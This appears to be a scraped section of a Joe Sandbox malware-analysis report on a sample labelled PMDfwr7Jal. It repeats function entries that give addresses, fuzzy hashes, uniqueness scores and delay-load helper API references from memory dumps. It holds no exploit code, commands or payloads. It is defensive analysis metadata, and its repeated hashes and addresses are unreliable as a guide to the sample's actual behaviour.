Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c51307a1084ca86ba426c120e0ec128f2319afa273d423ee075844c2e8ce57db
Instruction ID: 9ee47374069831d8ca1466b5a4e238b29d495bc89d6cfde695a8e8758ffc6b8c
Opcode Fuzzy Hash: c51307a1084ca86ba426c120e0ec128f2319afa273d423ee075844c2e8ce57db
Instruction Fuzzy Hash: 26B012D176D011AC311861087D06D36021EC4C1B10330C02AB81DD01C2D64CAD054831

Uniqueness

Uniqueness Score: -1.00%

Function 0072DAD9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072DAB2

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e97a0960d6a73b0ed8305f14bfee74da58b32f73e7300528fce4d59e157be01b
Instruction ID: 0b1965348089098d03aae23c26fad96f7e66e4566d26663025a970ff659d95ae
Opcode Fuzzy Hash: e97a0960d6a73b0ed8305f14bfee74da58b32f73e7300528fce4d59e157be01b
Instruction Fuzzy Hash: 78B012D136C011AC311C714A7D06E3E026CD0C4B10330C52BB41EC0045E54C8C0A8831

Uniqueness

Uniqueness Score: -1.00%

Function 0072DACF Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072DAB2

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7bbf6df6a6a8aea28a3d60c348c8aa1f8e25f3f2a89bfd5735fbdfd03f341093
Instruction ID: 3d7bfe4c7f39b21d87f5f31d44613f056126feedaa9795936347a5a92a476253
Opcode Fuzzy Hash: 7bbf6df6a6a8aea28a3d60c348c8aa1f8e25f3f2a89bfd5735fbdfd03f341093
Instruction Fuzzy Hash: AAB012E136C011EC311C71497D06D3A026CC0C0B10330C12BB81EC0045D54C8D058831

Uniqueness

Uniqueness Score: -1.00%

Function 0072DB01 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072DAB2

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 09bd6c678162abc47ad5e8a924dbb8108bec98cf3ea4aa3d0727ff3b71ee6e6e
Instruction ID: db852f025b62595b705038aff09ca54b2aa2a695dc6b7bb695dc0ce1c24ef087
Opcode Fuzzy Hash: 09bd6c678162abc47ad5e8a924dbb8108bec98cf3ea4aa3d0727ff3b71ee6e6e
Instruction Fuzzy Hash: 6DB012D13AC111AC311C71497D06E3A026CE0C0B10330C12BB41EC0045D54C8C058935

Uniqueness

Uniqueness Score: -1.00%

Function 0072DBFC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072DBD5

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2afa4f3e4262f0a038078624c90416799ddd3963623362b70b074658486f3c28
Instruction ID: 90fc533e17e52ef3e1365ce4b3c106a9c7bc5180be9e31788203563b7bbf3bf9
Opcode Fuzzy Hash: 2afa4f3e4262f0a038078624c90416799ddd3963623362b70b074658486f3c28
Instruction Fuzzy Hash: C3B012D53AC022AC311C51183E1BD37021CC0C0B10730C03AB51DC0041DE4C8C068031

Uniqueness

Uniqueness Score: -1.00%

Function 0072DBE8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072DBD5

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6dea205047fd66206925adda62db96cbf784852c44e328a964851243883a98c9
Instruction ID: 0ddb624e7ef77a7a7845f9ff12f67aee511d12fae59969f34cae5a7b2f7ea0f1
Opcode Fuzzy Hash: 6dea205047fd66206925adda62db96cbf784852c44e328a964851243883a98c9
Instruction Fuzzy Hash: 79B012D53AC122EC311C51183D1BD37022CC0C0B10730C03AB81DC1041DE4C8C098031

Uniqueness

Uniqueness Score: -1.00%

Function 0072DBDE Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072DBD5

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9b7889ef933bf16218d4d95d1f8f4a2f0353b959c33ed835a46415c1ffa28ba6
Instruction ID: 3f19993f8e45e98cd9e5f8d9d85c28414e98e3bf63699e7c92a33666d6404146
Opcode Fuzzy Hash: 9b7889ef933bf16218d4d95d1f8f4a2f0353b959c33ed835a46415c1ffa28ba6
Instruction Fuzzy Hash: 14B012D53AC021AC311851283D1BE36021CE0C0B10730803AB42EC0041DA4C8C098031

Uniqueness

Uniqueness Score: -1.00%

Function 0072DBC3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072DBD5

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: aaa1700c881546a9cf42f4e8e7b22c248b5202a7a4750244f548bff9fa14fe49
Instruction ID: 2908f18f648fa4b9ca63ab635548d1025016dd3b6faf7cd99281109f3b81e336
Opcode Fuzzy Hash: aaa1700c881546a9cf42f4e8e7b22c248b5202a7a4750244f548bff9fa14fe49
Instruction Fuzzy Hash: 44B012D53BC126BC321811143D1BC37021CC0C0B10B30813AB419D00419E4C8C498031

Uniqueness

Uniqueness Score: -1.00%

Function 0072DC53 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072DC36

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 492d754ee5fe90bb57e68df0166b0b9b07a846e5aa80de8bd9569b11f1b6621e
Instruction ID: d29873323aa1381628719bd46694f6703335da79b6fc449813f4dc2472dafb44
Opcode Fuzzy Hash: 492d754ee5fe90bb57e68df0166b0b9b07a846e5aa80de8bd9569b11f1b6621e
Instruction Fuzzy Hash: C9B012D526C121AD311C71087D0AD36022CC0C8B20370C52AB91DD0141E68C9C458035

Uniqueness

Uniqueness Score: -1.00%

Function 0072DC5D Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072DC36

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ba077bc3bead7fe7340516403da47f09258d251665f5b75cf4ce9a336a946946
Instruction ID: 4225fc37d89aeed1deef5d3685c9118d53eee4b1b885b6bf5589e164dfe5eca8
Opcode Fuzzy Hash: ba077bc3bead7fe7340516403da47f09258d251665f5b75cf4ce9a336a946946
Instruction Fuzzy Hash: 32B012D527C221AD311C71087D0AD36032CD0C4B10370852BB51DD0141E68C9C454035

Uniqueness

Uniqueness Score: -1.00%

Function 0072DC24 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072DC36

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1f5f83bf5eb59843e8d3c8ca6e4ffa475fcdbf4a949f7df3a1bd286b4019e622
Instruction ID: bee3a5ffe25d5998e22b665436231dd48148284d4d9d7f74ddaab638db0594d0
Opcode Fuzzy Hash: 1f5f83bf5eb59843e8d3c8ca6e4ffa475fcdbf4a949f7df3a1bd286b4019e622
Instruction Fuzzy Hash: B2B012D526C225BD311C31047F0AC36022CC1C4B10770862AB519E0041A68C9C855035

Uniqueness

Uniqueness Score: -1.00%

Function 0072D8D9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072D8A3

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 188f4f9a8e9c4bbd9f76f7a93661a53bfca9a9dd5c2bb6c7c6d9bc63570505e9
Instruction ID: 95f3f35bcbe5c1ae8cc89d63b71b824bec70ff1ced7023085274504e9eb14d05
Opcode Fuzzy Hash: 188f4f9a8e9c4bbd9f76f7a93661a53bfca9a9dd5c2bb6c7c6d9bc63570505e9
Instruction Fuzzy Hash: F2A011E2AAC022BC30282200BE0AC3A022CC8C0B20330880AB80AA00C0EA88AE080830

Uniqueness

Uniqueness Score: -1.00%

Function 0072D979 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072D8A3

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 76fe490cff2f6dd4144c532370f3abe78b2aeee7f6bab64af512a36d1c8b54e2
Instruction ID: 95f3f35bcbe5c1ae8cc89d63b71b824bec70ff1ced7023085274504e9eb14d05
Opcode Fuzzy Hash: 76fe490cff2f6dd4144c532370f3abe78b2aeee7f6bab64af512a36d1c8b54e2
Instruction Fuzzy Hash: F2A011E2AAC022BC30282200BE0AC3A022CC8C0B20330880AB80AA00C0EA88AE080830

Uniqueness

Uniqueness Score: -1.00%

Function 0072D965 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072D8A3

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9e320d7985b7644bdbcd39a71759fa5d1eb7dd187d0718819063b9fa1138ae78
Instruction ID: 95f3f35bcbe5c1ae8cc89d63b71b824bec70ff1ced7023085274504e9eb14d05
Opcode Fuzzy Hash: 9e320d7985b7644bdbcd39a71759fa5d1eb7dd187d0718819063b9fa1138ae78
Instruction Fuzzy Hash: F2A011E2AAC022BC30282200BE0AC3A022CC8C0B20330880AB80AA00C0EA88AE080830

Uniqueness

Uniqueness Score: -1.00%

Function 0072D96F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072D8A3

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c6cdc042949fe2114f76b915d7094c5137ace078ecee81b8f420d79c940142bd
Instruction ID: 95f3f35bcbe5c1ae8cc89d63b71b824bec70ff1ced7023085274504e9eb14d05
Opcode Fuzzy Hash: c6cdc042949fe2114f76b915d7094c5137ace078ecee81b8f420d79c940142bd
Instruction Fuzzy Hash: F2A011E2AAC022BC30282200BE0AC3A022CC8C0B20330880AB80AA00C0EA88AE080830

Uniqueness

Uniqueness Score: -1.00%

Function 0072D951 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072D8A3

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c51d725f5953e29380b9275e779ac44bc911e8e1f1ad1ce18bea4c3f1224114f
Instruction ID: 95f3f35bcbe5c1ae8cc89d63b71b824bec70ff1ced7023085274504e9eb14d05
Opcode Fuzzy Hash: c51d725f5953e29380b9275e779ac44bc911e8e1f1ad1ce18bea4c3f1224114f
Instruction Fuzzy Hash: F2A011E2AAC022BC30282200BE0AC3A022CC8C0B20330880AB80AA00C0EA88AE080830

Uniqueness

Uniqueness Score: -1.00%

Function 0072D95B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072D8A3

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f3514ec6ab21105b1c5f99d6ad1a31a55b5fca6187472484963ba6ad40d10247
Instruction ID: 95f3f35bcbe5c1ae8cc89d63b71b824bec70ff1ced7023085274504e9eb14d05
